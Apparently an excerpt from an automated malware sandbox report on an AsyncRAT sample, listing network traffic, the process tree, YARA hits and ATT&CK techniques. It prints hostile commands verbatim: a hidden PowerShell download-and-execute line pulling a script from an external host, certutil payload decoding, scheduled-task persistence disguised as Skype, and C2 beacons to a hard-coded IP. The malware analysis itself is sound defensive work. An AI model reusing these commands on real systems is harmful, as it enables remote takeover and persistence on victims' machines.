Apr 18, 2021 10:03:15.075535059 CEST	53	55016	8.8.8.8	192.168.2.5
Apr 18, 2021 10:03:27.076179981 CEST	64345	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:03:27.124803066 CEST	53	64345	8.8.8.8	192.168.2.5
Apr 18, 2021 10:03:29.331830025 CEST	57128	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:03:29.391139984 CEST	53	57128	8.8.8.8	192.168.2.5
Apr 18, 2021 10:03:33.474968910 CEST	54791	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:03:33.548017979 CEST	53	54791	8.8.8.8	192.168.2.5
Apr 18, 2021 10:04:00.248738050 CEST	50463	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:04:00.301547050 CEST	53	50463	8.8.8.8	192.168.2.5
Apr 18, 2021 10:04:00.882313013 CEST	50394	53	192.168.2.5	8.8.8.8
Apr 18, 2021 10:04:00.949362040 CEST	53	50394	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 18, 2021 10:02:26.154083014 CEST	192.168.2.5	8.8.8.8	0x51	Standard query (0)	www.uplooder.net	A (IP address)	IN (0x0001)
Apr 18, 2021 10:03:06.820816040 CEST	192.168.2.5	8.8.8.8	0xe716	Standard query (0)	www.uplooder.net	A (IP address)	IN (0x0001)
Apr 18, 2021 10:03:15.015882969 CEST	192.168.2.5	8.8.8.8	0x972c	Standard query (0)	gist.githubusercontent.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Apr 18, 2021 10:02:26.220257998 CEST	8.8.8.8	192.168.2.5	0x51	No error (0)	www.uplooder.net	144.76.38.100	A (IP address)	IN (0x0001)
Apr 18, 2021 10:03:06.881640911 CEST	8.8.8.8	192.168.2.5	0xe716	No error (0)	www.uplooder.net	144.76.38.100	A (IP address)	IN (0x0001)
Apr 18, 2021 10:03:15.075535059 CEST	8.8.8.8	192.168.2.5	0x972c	No error (0)	gist.githubusercontent.com	185.199.108.133	A (IP address)	IN (0x0001)
Apr 18, 2021 10:03:15.075535059 CEST	8.8.8.8	192.168.2.5	0x972c	No error (0)	gist.githubusercontent.com	185.199.111.133	A (IP address)	IN (0x0001)
Apr 18, 2021 10:03:15.075535059 CEST	8.8.8.8	192.168.2.5	0x972c	No error (0)	gist.githubusercontent.com	185.199.109.133	A (IP address)	IN (0x0001)
Apr 18, 2021 10:03:15.075535059 CEST	8.8.8.8	192.168.2.5	0x972c	No error (0)	gist.githubusercontent.com	185.199.110.133	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

46.1.54.174:77

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49709	46.1.54.174	77	C:\ProgramData\conhost.exe

Timestamp	kBytes transferred	Direction	Data
Apr 18, 2021 10:02:22.799725056 CEST	1468	OUT	POST /Vre HTTP/1.1 Accept: / User-Agent: tahoo_D0567C33\computer\user\Microsoft Windows 10 Pro\Windows Defender\\Yes\FALSE\ Accept-Language: en-us UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 46.1.54.174:77 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Apr 18, 2021 10:04:29.446614027 CEST	5301	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Sun, 18 Apr 2021 08:04:28 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49713	46.1.54.174	77	C:\ProgramData\conhost.exe

Timestamp	kBytes transferred	Direction	Data
Apr 18, 2021 10:02:32.975008011 CEST	1625	OUT	POST /Vre HTTP/1.1 Accept: / User-Agent: tahoo_D0567C33\computer\user\Microsoft Windows 10 Pro\Windows Defender\\Yes\FALSE\ Accept-Language: en-us UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 46.1.54.174:77 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49720	46.1.54.174	77	C:\ProgramData\conhost.exe

Timestamp	kBytes transferred	Direction	Data
Apr 18, 2021 10:02:44.811728954 CEST	1723	OUT	POST /Vre HTTP/1.1 Accept: / User-Agent: tahoo_D0567C33\computer\user\Microsoft Windows 10 Pro\Windows Defender\\Yes\FALSE\ Accept-Language: en-us UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 46.1.54.174:77 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49721	46.1.54.174	77	C:\ProgramData\conhost.exe

Timestamp	kBytes transferred	Direction	Data
Apr 18, 2021 10:02:53.645977020 CEST	1725	OUT	POST /Vre HTTP/1.1 Accept: / User-Agent: tahoo_D0567C33\computer\user\Microsoft Windows 10 Pro\Windows Defender\\Yes\FALSE\ Accept-Language: en-us UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 46.1.54.174:77 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Apr 18, 2021 10:02:26.412724018 CEST	144.76.38.100	443	192.168.2.5	49711	CN=uplooder.net CN=GoGetSSL RSA DV CA, O=GoGetSSL, L=Riga, C=LV CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	CN=GoGetSSL RSA DV CA, O=GoGetSSL, L=Riga, C=LV CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Fri Jan 31 01:00:00 CET 2020 Thu Sep 06 02:00:00 CEST 2018 Tue Mar 12 01:00:00 CET 2019	Mon Jan 31 00:59:59 CET 2022 Wed Sep 06 01:59:59 CEST 2028 Mon Jan 01 00:59:59 CET 2029	769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0	54328bd36c14bd82ddaa0c04b25ed9ad
					CN=GoGetSSL RSA DV CA, O=GoGetSSL, L=Riga, C=LV	CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	Thu Sep 06 02:00:00 CEST 2018	Wed Sep 06 01:59:59 CEST 2028
					CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Tue Mar 12 01:00:00 CET 2019	Mon Jan 01 00:59:59 CET 2029
Apr 18, 2021 10:03:07.029568911 CEST	144.76.38.100	443	192.168.2.5	49722	CN=uplooder.net CN=GoGetSSL RSA DV CA, O=GoGetSSL, L=Riga, C=LV CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	CN=GoGetSSL RSA DV CA, O=GoGetSSL, L=Riga, C=LV CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Fri Jan 31 01:00:00 CET 2020 Thu Sep 06 02:00:00 CEST 2018 Tue Mar 12 01:00:00 CET 2019	Mon Jan 31 00:59:59 CET 2022 Wed Sep 06 01:59:59 CEST 2028 Mon Jan 01 00:59:59 CET 2029	769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0	54328bd36c14bd82ddaa0c04b25ed9ad
					CN=GoGetSSL RSA DV CA, O=GoGetSSL, L=Riga, C=LV	CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	Thu Sep 06 02:00:00 CEST 2018	Wed Sep 06 01:59:59 CEST 2028
					CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Tue Mar 12 01:00:00 CET 2019	Mon Jan 01 00:59:59 CET 2029

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: xuXIetZvv6.exe PID: 6348 Parent PID: 5660

General

Start time:	10:02:24
Start date:	18/04/2021
Path:	C:\Users\user\Desktop\xuXIetZvv6.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\xuXIetZvv6.exe'
Imagebase:	0x6e0000
File size:	1953792 bytes
MD5 hash:	200CB4B34EA0E61FE8454731BF7A107A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Molerats_Jul17_Sample_5, Description: Detects Molerats sample - July 2017, Source: 00000000.00000002.236414924.0000000002C42000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: 00000000.00000002.236414924.0000000002C42000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: 00000000.00000000.219734739.00000000007D8000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: 00000000.00000002.234484249.00000000007D8000.00000002.00020000.sdmp, Author: Joe Security Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000002.236345549.0000000002C31000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	low

Analysis Process: cmd.exe PID: 6548 Parent PID: 6348

General

Start time:	10:02:27
Start date:	18/04/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Roaming\DVDFabPlayer5Activator.cmd' '
Imagebase:	0x7ff7eef80000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6556 Parent PID: 6548

General

Start time:	10:02:28
Start date:	18/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: Ne - Copy.exe PID: 6568 Parent PID: 6348

General

Start time:	10:02:28
Start date:	18/04/2021
Path:	C:\Users\user\AppData\Roaming\Ne - Copy.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Roaming\Ne - Copy.exe'
Imagebase:	0x140000000
File size:	1732096 bytes
MD5 hash:	A4A1FA7769DF7C47A6D69FB66AA1EB30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 26%, Metadefender, Browse Detection: 41%, ReversingLabs
Reputation:	low

Analysis Process: cacls.exe PID: 6648 Parent PID: 6548

General

Start time:	10:02:28
Start date:	18/04/2021
Path:	C:\Windows\System32\cacls.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\cacls.exe' 'C:\Windows\system32\config\system'
Imagebase:	0x7ff697520000
File size:	32768 bytes
MD5 hash:	30C3BBEA1544A7E3EC2103931AEF98FF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: wscript.exe PID: 6704 Parent PID: 6348

General

Start time:	10:02:29
Start date:	18/04/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\winlogon.vbs'
Imagebase:	0x7ff784910000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: 00000006.00000002.491404770.000002F0A0FD8000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: 00000006.00000002.495593185.000002F0A2D40000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: 00000006.00000002.492055438.000002F0A12B5000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: certutil.exe PID: 6712 Parent PID: 6548

General

Start time:	10:02:29
Start date:	18/04/2021
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	certutil -decode 'C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.tmp' 'C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec'
Imagebase:	0x7ff77e360000
File size:	1557504 bytes
MD5 hash:	EB199893441CED4BBBCB547FE411CF2D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000007.00000002.234040643.000001B999F40000.00000004.00000020.sdmp, Author: Florian Roth
Reputation:	moderate

Analysis Process: conhost.exe PID: 6720 Parent PID: 6568

General

Start time:	10:02:29
Start date:	18/04/2021
Path:	C:\ProgramData\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData/conhost.exe
Imagebase:	0x7ff797770000
File size:	413832 bytes
MD5 hash:	FDBD7B1910D980CF7273796A0119D252
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low

Analysis Process: OpenWith.exe PID: 6748 Parent PID: 792

General

Start time:	10:02:29
Start date:	18/04/2021
Path:	C:\Windows\System32\OpenWith.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\OpenWith.exe -Embedding
Imagebase:	0x7ff6c4d50000
File size:	111120 bytes
MD5 hash:	D179D03728E95E040A889F760C1FC402
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: schtasks.exe PID: 6876 Parent PID: 6720

General

Start time:	10:02:32
Start date:	18/04/2021
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe
Imagebase:	0x7ff7e0280000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: powershell.exe PID: 6888 Parent PID: 6704

General

Start time:	10:02:32
Start date:	18/04/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\winlogon.vbs'))'
Imagebase:	0x7ff617cb0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: 0000000B.00000002.245936252.00000179B9330000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: conhost.exe PID: 6900 Parent PID: 6876

General

Start time:	10:02:32
Start date:	18/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: attrib.exe PID: 6912 Parent PID: 6548

General

Start time:	10:02:32
Start date:	18/04/2021
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +r 'C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec'
Imagebase:	0x7ff72d250000
File size:	21504 bytes
MD5 hash:	FDC601145CD289C6FBC96D3F805F3CD7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: powershell.exe PID: 6920 Parent PID: 6704

General

Start time:	10:02:32
Start date:	18/04/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa
Imagebase:	0x7ff617cb0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000002.504520772.000001339CFF0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000003.272338570.0000013386CFC000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: conhost.exe PID: 6956 Parent PID: 6888

General

Start time:	10:02:33
Start date:	18/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6980 Parent PID: 6920

General

Start time:	10:02:33
Start date:	18/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6252 Parent PID: 904

General

Start time:	10:02:34
Start date:	18/04/2021
Path:	C:\ProgramData\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\conhost.exe
Imagebase:	0x7ff7aafd0000
File size:	413832 bytes
MD5 hash:	FDBD7B1910D980CF7273796A0119D252
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: schtasks.exe PID: 3020 Parent PID: 6252

General

Start time:	10:02:38
Start date:	18/04/2021
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe
Imagebase:	0x7ff7e0280000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 1688 Parent PID: 3020

General

Start time:	10:02:41
Start date:	18/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: OpenWith.exe PID: 988 Parent PID: 792

General

Start time:	10:02:39
Start date:	18/04/2021
Path:	C:\Windows\System32\OpenWith.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\OpenWith.exe -Embedding
Imagebase:	0x7ff6c4d50000
File size:	111120 bytes
MD5 hash:	D179D03728E95E040A889F760C1FC402
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 5440 Parent PID: 3472

General

Start time:	10:02:52
Start date:	18/04/2021
Path:	C:\ProgramData\conhost.exe
Wow64 process (32bit):	false
Commandline:	'C:\ProgramData\conhost.exe'
Imagebase:	0x7ff7aafd0000
File size:	413832 bytes
MD5 hash:	FDBD7B1910D980CF7273796A0119D252
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: schtasks.exe PID: 5364 Parent PID: 5440

General

Start time:	10:02:54
Start date:	18/04/2021
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe
Imagebase:	0x7ff7e0280000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 328 Parent PID: 5364

General

Start time:	10:02:54
Start date:	18/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6652 Parent PID: 3472

General

Start time:	10:03:00
Start date:	18/04/2021
Path:	C:\ProgramData\conhost.exe
Wow64 process (32bit):	false
Commandline:	'C:\ProgramData\conhost.exe'
Imagebase:	0x7ff7aafd0000
File size:	413832 bytes
MD5 hash:	FDBD7B1910D980CF7273796A0119D252
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: schtasks.exe PID: 6948 Parent PID: 6652

General

Start time:	10:03:02
Start date:	18/04/2021
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe
Imagebase:	0x7ff7e0280000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6872 Parent PID: 6948

General

Start time:	10:03:03
Start date:	18/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 1260 Parent PID: 3472

General

Start time:	10:03:08
Start date:	18/04/2021
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe'
Imagebase:	0x7ff772c00000
File size:	413832 bytes
MD5 hash:	FDBD7B1910D980CF7273796A0119D252
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Services
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
